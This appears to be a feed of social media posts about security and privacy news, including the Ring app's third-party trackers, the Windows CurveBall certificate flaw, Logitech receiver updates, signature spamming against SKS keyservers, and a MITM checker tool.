"My problem with contact tracing apps is that they have absolutely no value. I'm not even talking about the privacy concerns, I mean the efficacy. Does anybody think this will do something useful? ... This is just something governments want to do for the hell of it. To me, it's just techies doing techie things because they don't know what else to do." - Bruce Schneier
https://www.schneier.com/blog/archives/2020/05/me_on_covad-19_.html
BREAKING: We’ve confirmed that the Ring doorbell app on Android covertly shares personally identifiable information on its users with third-party companies, including Facebook.
https://www.eff.org/deeplinks/2020/01/ring-doorbell-app-packed-third-party-trackers
Ring isn't just a product that allows users to surveil their neighbors. The company also uses it to surveil its customers.An investigation by EFF of the Ring doorbell app for Android found it to be packed with third-party trackers sending out a plethora of customers’ personally identifiable...
Windows #curveball cryptographic engine vulnerability is pretty hilarious. Apparently Windows allowed ECC security certs to specify the elliptical curve parameters used to validate the cert. So you could trivially create certs that would validate against trusted root certs (if those root certs were using ECC).
The fact the NSA disclosed the vulnerability (instead of keeping it) is probably a good indication that they're already able to trivially make certs that validate against the root store.
Research by: Ben Herzog Introduction When some people hear “Cryptography”, they think of their Wifi password, of the little green lock icon next to the address of their favorite website, and of the difficulty they’d face trying to snoop in other people’s email. Others may recall the litany of vulnerabilities of recent years that boasted a... Click to Read More
If you've got a #Logitech wireless keyboard or mouse, then you should really update the receiver firmware. Turns out those things are just as insecure as you thought and keystroke interception/injection can open the door to absolute pwnage (especially for bank/corporate networks where getting proximity is easy).
https://support.logi.com/hc/en-us/community/posts/360033207154-Logitech-Unifying-Receiver-Update
So, I couldn't stop thinking about the SKS keyserver pool thing...
I decided the only way to clear my head, would be to write up my mitigation idea and submit it to the SKS-Devel mailing list.
https://lists.nongnu.org/archive/html/sks-devel/2019-07/msg00013.html
I am now looking forward to being told exactly how wrong I am. 😬
IMO the simplest long term solution is just to drop attestation certificate support altogether. All people really need is access to the public key and any revocation certs.
Confidence in a public key is better established by having the owner post it over multiple independent official channels (e.g. official website, official social media account, keybase, etc).
Attestation has gone from benign but useless part of #OpenPGP, to malignant.
A "new" attack on SKS Keyservers can basically kill GPG. Turns out that spamming a target cert with ~150,000 attestation (signature) certificates will cause GPG to grind to a halt on any system with the targeted cert installed when doing any operation with the targeted cert.
SKS Key Servers either don't have protections in place to prevent this spam, or sync with servers that don't.
https://gist.github.com/rjhansen/67ab921ffb4084c865b3618d6955275f
Game of Thrones season 8 should be officially rated as 3.6 Roentgen, because fanbois will insist it was "not great, but not terrible" through willful self-deception, while the rest of us recognize that the f'n core exploded.
Seems that @hexatomium (Twitter handle) has come up with a handy little MITM Checker. Basically the program connects to a list of the top 100 sites and notes any suspicious certs in the handshakes.
Discussion thread:
https://www.wilderssecurity.com/threads/mitm-checker.416844/
Electronic Frontier Foundation
BjarniBjarniBjarni 🙊 🇮🇸 🍏